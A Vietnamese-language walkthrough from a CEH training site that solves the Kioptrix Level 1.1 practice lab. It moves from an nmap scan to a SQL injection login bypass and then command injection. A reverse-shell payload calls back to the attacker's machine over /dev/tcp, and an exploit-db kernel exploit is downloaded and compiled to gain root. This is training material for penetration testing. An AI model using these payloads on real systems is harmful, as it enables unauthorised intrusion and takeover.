Chủ đề : Hack Kioptrix Level-1.1 (Thử thách Boot2Root) SQL Injection + Command Injection | www.cehvietnam.com | VLabInjection

Virtual-Labs Kioptrix này là thử thách căn bản. Mục tiêu của trò chơi là giành quyền truy cập root thông qua bất kỳ phương tiện nào có thể . Mục đích của bài này là tìm hiểu các công cụ và kỹ thuật nền tảng trong việc đánh giá và khai thác lỗ hổng. Có nhiều hơn một cách để hoàn thành mục tiêu đề ra. Đây cũng là lab khuyến nghị nên làm dành cho các bạn tham gia những chương trình đào tạo hacking và pentesting như CEH , OSCP, eJPT, Pentest+
Các bạn có thể Tải xuống Kioptrix 1.1 từ đây và chạy chúng trong máy ảo Vmware của mình.
Demo
Hãy bắt đầu!!
Bật máy tấn công của bạn và sử dụng lệnh netdetect, hay nmap, netdiscover để quét mạng cục bộ của bạn để lấy IP mục tiêu.

Như hình chúng ta sẽ nhắm mục tiêu tại IP 192.168.1.111, hãy bỏ qua việc liệt kê và quét các cổng và giao thức đang mở. Với sự trợ giúp quét tích cực của nmap, chúng tôi đã quan sát thấy một số cổng và dịch vụ mở đang chạy trên đó.
nmap -A 192.168.1.111

Vì có cổng được mở 80 nên ta sẽ khám phá IP mục tiêu trong trình duyệt web và thấy trang đăng nhập sau.
URL: http://192.168.1.111

Khi thấy web và form đăng nhập , hãy thử thực hiện SQL injection ở mức cơ bản như sau.
Username: 1' or '1'
Password: 1' or '1''

Tuyệt vời!!! Chúng tôi đã đăng nhập thành công vào bảng điều khiển Web quản trị cơ bản nơi chúng ta tìm thấy một trường văn bản trống để người dùng nhập dữ liệu. Bất cứ khi nào tôi thấy loại tình huống như vậy, tôi đều cố gắng kiểm tra nó với các lỗ hổng chèn lệnh (command injection).

Nếu đã học CEH tại CEH VIETNAM hoặc tham khảo tài liệu ôn tập PWK OSCP, OWASP WEB Hacking ta sẽ nhớ một vài cách để thử chèn lệnh , như trong lab Metasploitable 2. Do đó, chúng tôi thử gửi lệnh ;id để liệt kê UID và GID của người dùng đã đăng nhập.

Kết quả là xuất hiện UID và GID của apache và đây chính là bằng chứng cho thấy ứng dụng này dễ bị tiêm lệnh.

Trong một terminal mới, hãy khởi chạy trình bao kết nối netcat để sinh ra tty shell của nạn nhân
127.0.0.1; bash -i >& /dev/tcp/192.168.1.107/8888 0>&1

Ngay sau khi payload ở trên được gửi, bạn sẽ nhận được shell pty của nạn nhân thông qua phiên netcat.
Tuyệt vời!! Bạn có thể thấy chúng ta đã truy cập vào command shell của nạn nhân bên trong netcat, hãy thâm nhập sâu hơn vào nó để truy cập root.
id
uname -a
Sau đó, với sự trợ giúp của Google, hãy tìm cách khai thác Kernel của target để leo thang đặc quyền và may mắn tìm thấy “Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit”, do đó ta có thể sử dụng 9542exploi t để leo thang đặc quyền.
cd /tmp
wget https://www.exploit-db.com/download/9542 --no-check-certificate
mv 9542 shell.c

gcc shell.c
./a.out
id
whoami
B0000MM!! Các bạn đã có lệnh shell của máy nạn nhân với quyền truy cập root. (CEH VIETNAM / HA & Virtual-Labs Co)